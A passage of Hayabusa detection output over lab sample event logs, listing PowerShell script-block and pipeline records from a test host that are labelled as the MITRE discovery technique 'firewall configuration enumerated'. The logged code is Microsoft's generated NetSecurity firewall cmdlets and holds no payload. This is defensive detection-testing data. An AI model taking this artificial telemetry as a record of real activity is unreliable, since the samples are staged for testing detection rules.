$__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 
'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceTypeFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" 
ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceTypeFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, 
$script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] 
${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', 
${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch 
{ $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallSecurityFilter ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if 
($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] 
